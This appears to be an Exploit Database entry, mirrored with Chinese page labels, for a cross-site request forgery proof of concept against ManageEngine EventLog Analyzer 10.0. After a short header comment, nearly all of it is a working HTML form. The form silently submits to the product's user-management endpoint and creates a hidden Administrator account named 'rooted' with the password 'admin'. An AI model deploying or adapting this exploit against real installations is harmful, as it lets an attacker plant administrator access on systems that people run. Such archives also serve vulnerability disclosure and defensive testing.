ManageEngine EventLog Analyzer 10.0 Build 10001 – Cross-Site Request Forgery

• Exploit Database
• 51 阅读

• 作者： Akash S. Chavan
  日期： 2015-05-18
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/37059/

• <!--
  [+] Exploit Title: ManageEngine EventLog Analyzer Version 10.0 Cross Site
  Request Forgery Exploit
  [+] Date: 31/03/2015
  [+] Exploit Author: Akash S. Chavan
  [+] Vendor Homepage: https://www.manageengine.com/
  [+] Software Link:
  https://download.manageengine.com/products/eventlog/91517554/ManageEngine_EventLogAnalyzer_64bit.exe
  [+] Version: Version: 10.0, Build Number: 10001
  [+] Tested on: Windows 8.1/PostgreSQL
  -->
  
  <html>
  	<body>
  <form action="http://127.0.0.1:8400/event/userManagementForm.do" method="POST">
  <input type="hidden" name="domainId" value="" />
  <input type="hidden" name="roleId" value="" />
  <input type="hidden" name="addField" value="true" />
  <input type="hidden" name="userType" value="Administrator" />
  <input type="hidden" name="userName" value="rooted" />
  <input type="hidden" name="pwd1" value="admin" />
  <input type="hidden" name="password" value="admin" />
  <input type="hidden" name="userGroup" value="Administrator" />
  <input type="hidden" name="email" value="" />
  <input type="hidden" name="AddSubmit" value="Add&#32;User" />
  <input type="hidden" name="alpha" value="" />
  <input type="hidden" name="userIds" value="" />
  <input type="hidden" name="roleName" value="" />
  <input type="hidden" name="selDevices" value="" />
  <input type="hidden" name="doAction" value="" />
  <input type="hidden" name="productName" value="eventlog" />
  <input type="hidden" name="licType" value="Prem" />
  <input type="hidden" name="next" value="" />
  <input type="hidden" name="currentUserId" value="1" />
  <input type="hidden" name="isAdminServer" value="false" />
  <input type="submit" value="Click Me" />
  </form>
  </body>
  </html>